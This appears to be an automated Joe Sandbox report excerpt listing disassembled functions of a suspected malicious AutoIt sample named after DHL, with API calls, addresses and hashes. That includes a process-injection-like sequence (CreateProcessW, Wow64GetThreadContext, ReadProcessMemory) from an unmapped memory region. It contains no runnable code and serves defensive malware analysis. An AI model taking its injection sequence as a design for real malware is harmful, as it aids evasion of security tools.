                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 146820519-0
                                                                                      • Opcode ID: b0595f09b93040b80c5313767ccba0427409f5c37c982e43da4a3971517e815a
                                                                                      • Instruction ID: 7251716b715d9ac36e0e1feaee466f7da4e5e2c1d3c22304b37f8680f36e3c59
                                                                                      • Opcode Fuzzy Hash: b0595f09b93040b80c5313767ccba0427409f5c37c982e43da4a3971517e815a
                                                                                      • Instruction Fuzzy Hash: A5127B719083019FD764DF28C484BAABBE9FF85314F04895DE8899B262DB31ED45CF92
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,000685CC,?,000F8CC8,0000000C), ref: 00068704
                                                                                      • GetLastError.KERNEL32(?,000685CC,?,000F8CC8,0000000C), ref: 0006870E
                                                                                      • __dosmaperr.LIBCMT ref: 00068739
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 2583163307-0
                                                                                      • Opcode ID: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                                                                      • Instruction ID: e77c40e0a1a19a6aa65ad04b2b4db1b3f317515e4f1d2a3038c1e7443bb53d85
                                                                                      • Opcode Fuzzy Hash: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                                                                      • Instruction Fuzzy Hash: 23016B3260427026D2B06334EC45BBE27CB4B81B75F384319F9489B1D3DEA0CD818350
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 000417F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: CALL
                                                                                      • API String ID: 1385522511-4196123274
                                                                                      • Opcode ID: a17cecad58c4e25db899f7d786d9f6bb710a66cd6bdaa44a6e1dfe7615ea8127
                                                                                      • Instruction ID: 131d13fdc4c87afe9fefdfac8545a3c5f6b897048f6797496ca4810a25eefa46
                                                                                      • Opcode Fuzzy Hash: a17cecad58c4e25db899f7d786d9f6bb710a66cd6bdaa44a6e1dfe7615ea8127
                                                                                      • Instruction Fuzzy Hash: D7228CB0608201DFC764DF14C484BAABBF1BF85314F15892DF4968B3A2D772E985CB46
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00072C8C
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                        • Part of subcall function 00032DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                      • String ID: X
                                                                                      • API String ID: 779396738-3081909835
                                                                                      • Opcode ID: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                                                                      • Instruction ID: 05ab4bbd3d5b030ec6946f69fa90b3635db417b9cf5f481a41f8a97cc44a9713
                                                                                      • Opcode Fuzzy Hash: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                                                                      • Instruction Fuzzy Hash: 3521A871E0025C9FDB42EF94C845BEE7BFCAF49714F008059E505B7241DBB85A898FA1
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_
                                                                                      • String ID:
                                                                                      • API String ID: 1144537725-0
                                                                                      • Opcode ID: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                                                                      • Instruction ID: b07283d3c423edfc6c6257780c463192faa4991bb9b3b0b77939080407e8d0fc
                                                                                      • Opcode Fuzzy Hash: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                                                                      • Instruction Fuzzy Hash: 3B319370904301DFE761DF24D884B9BBBE8FB49719F00092EF5DA87641E7B5AA44CB52
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00035773
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00074052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 3825175a88cf96097f5ba2d5498cc5af43a02d955c912096308ead8ad2fa563a
                                                                                      • Instruction ID: fff1b8bd7e689d600b43b52fbe58a9c6756cfe4e3882ba507494bea2bcaff2a9
                                                                                      • Opcode Fuzzy Hash: 3825175a88cf96097f5ba2d5498cc5af43a02d955c912096308ead8ad2fa563a
                                                                                      • Instruction Fuzzy Hash: 07018030145225B6E3720A2ADC0EF977F98EF067B1F148200BA9D5A1E0C7B45854CBD0
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 0003BB4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID:
                                                                                      • API String ID: 1385522511-0
                                                                                      • Opcode ID: b9d0bb2e6c18ae78193d4c2b9b6f470dd15511025b78a3449c588b0fd13efe51
                                                                                      • Instruction ID: 1ab05e007a4908f63834a4ab4a4743e44b945f5a79467c853724db3472ae997d
                                                                                      • Opcode Fuzzy Hash: b9d0bb2e6c18ae78193d4c2b9b6f470dd15511025b78a3449c588b0fd13efe51
                                                                                      • Instruction Fuzzy Hash: 1932DF30A00209DFDB61DF54C898BBEB7F9FF44318F14805AEA85AB251C7B4AE45CB51
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0117A39B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0117A431
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0117A453
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                      • Instruction ID: 8394ba27b47429974e3fbe63deaa4c8bb6c8fc286e22e552745a3b7f7daa9a3e
                                                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                      • Instruction Fuzzy Hash: 1F12CF24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: d2e6811e83956edacd61dc5d3bb8b2d44476a7ab4be1445e13642a4b0b14e8d7
                                                                                      • Instruction ID: f99d33a2a24f94c6927cf022aad34b5de8c7429976452716bddbabb0f655dd37
                                                                                      • Opcode Fuzzy Hash: d2e6811e83956edacd61dc5d3bb8b2d44476a7ab4be1445e13642a4b0b14e8d7
                                                                                      • Instruction Fuzzy Hash: 53D15C75A04209EFCB15DF98C8819EDBBB5FF88314F144059E919AB392DB30AE81CF91
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction ID: 65f49407338b2ccd74a4537c5ee3235da69a5044377b6247d62ddcf88a698c8f
                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction Fuzzy Hash: B731D2B5A0010ADBC768CF59D5C0A69FBA6FF49300B2486B5E80ACB656D731EDC1CBD4
                                                                                      APIs
                                                                                        • Part of subcall function 00034E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                                                                        • Part of subcall function 00034E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                                                                        • Part of subcall function 00034E90: FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EFD
                                                                                        • Part of subcall function 00034E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                                                                        • Part of subcall function 00034E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                                                                        • Part of subcall function 00034E59: FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 2632591731-0
                                                                                      • Opcode ID: 5bcb315241e1d961fc91645c6350c756c6ce8997a3ae639df69febc11a139ad9
                                                                                      • Instruction ID: 72bef9c433e68c672bc3e7a81239151b9055e0a5b278dc4dcac86c9fe5f09503
                                                                                      • Opcode Fuzzy Hash: 5bcb315241e1d961fc91645c6350c756c6ce8997a3ae639df69febc11a139ad9
                                                                                      • Instruction Fuzzy Hash: 6211E336600205AEDB26AFA4DC02FED77A9AF40711F14842DF546AA1D2EE74AA059B50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __wsopen_s
                                                                                      • String ID:
                                                                                      • API String ID: 3347428461-0
                                                                                      • Opcode ID: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                                                                      • Instruction ID: 0820ce8073b5f2ab3fd73f04513afe748f3e9fa2b1c0ae3a04001677ec502251
                                                                                      • Opcode Fuzzy Hash: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                                                                      • Instruction Fuzzy Hash: E411487590410AAFCB05DF58E940ADE7BF9EF48300F108199F808AB312DA30DA11CBA4
                                                                                      APIs
                                                                                        • Part of subcall function 00064C7D: RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                                                                      • _free.LIBCMT ref: 0006506C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 614378929-0
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034F6D
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CD26
                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0009CD19,?,?,?), ref: 0009CC59
                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0009CD19,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CC6E
                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0009CD19,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CC7A
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$Write
                                                                                      • String ID:
                                                                                      • API String ID: 3847668363-0
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      Similarity
                                                                                      • API ID: LongNamePath_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 541455249-0
                                                                                      APIs
                                                                                        • Part of subcall function 00033837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                                                                        • Part of subcall function 0003D730: GetInputState.USER32 ref: 0003D807
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                                                                        • Part of subcall function 000330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0003314E
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                      • String ID:
                                                                                      • API String ID: 3667716007-0
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00031CBC
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3098949447-0
                                                                                      APIs
                                                                                        • Part of subcall function 00035745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00035773
                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 000A76DE
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 2a796d901d8c87dee951d8a3e54a0b085730ca1bf9139d1c9abeb2a317d65c1f
                                                                                      • Instruction ID: 37eb4c6ece485dceaf6af09d13cd395d71dc1011fbdab4b5cea77db132a56f11
                                                                                      • Opcode Fuzzy Hash: 2a796d901d8c87dee951d8a3e54a0b085730ca1bf9139d1c9abeb2a317d65c1f
                                                                                      • Instruction Fuzzy Hash: 598194306087019FCB15EF64C891BADB7E5BF89314F04852DF8895B2A2DB70ED45CB52
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,000724E0), ref: 00036266
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 3fc327dab0e153dd22b4b725be35cfdcba644c8c12a56a845220016f172e9d62
                                                                                      • Instruction ID: 5cd43ea60c34be626aaa3b2757217ea7d6e7a30fd1b44f66c99dcd2c8af2bb3f
                                                                                      • Opcode Fuzzy Hash: 3fc327dab0e153dd22b4b725be35cfdcba644c8c12a56a845220016f172e9d62
                                                                                      • Instruction Fuzzy Hash: 6EE0B675400B01EFD3324F1AE804412FBF9FFE23613218A2ED1E692660D3B158868F50
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000001F4), ref: 0117ABF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction ID: c680c93a1d123fa5a6a6c2c62b8671a3dfe3b80c8b0ea19ac36e006822bdc12c
                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                      • Instruction Fuzzy Hash: 0DE0E67498410DEFDB00EFB4DA4969E7FB4EF04301F100161FD01D2281D7309D508A62
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000C961A
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C965B
                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 000C969F
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C96C9
                                                                                      • SendMessageW.USER32 ref: 000C96F2
                                                                                      • GetKeyState.USER32(00000011), ref: 000C978B
                                                                                      • GetKeyState.USER32(00000009), ref: 000C9798
                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C97AE
                                                                                      • GetKeyState.USER32(00000010), ref: 000C97B8
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C97E9
                                                                                      • SendMessageW.USER32 ref: 000C9810
                                                                                      • SendMessageW.USER32(?,00001030,?,000C7E95), ref: 000C9918
                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000C992E
                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000C9941
                                                                                      • SetCapture.USER32(?), ref: 000C994A
                                                                                      • ClientToScreen.USER32(?,?), ref: 000C99AF
                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000C99BC
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C99D6
                                                                                      • ReleaseCapture.USER32 ref: 000C99E1
                                                                                      • GetCursorPos.USER32(?), ref: 000C9A19
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C9A26
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9A80
                                                                                      • SendMessageW.USER32 ref: 000C9AAE
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9AEB
                                                                                      • SendMessageW.USER32 ref: 000C9B1A
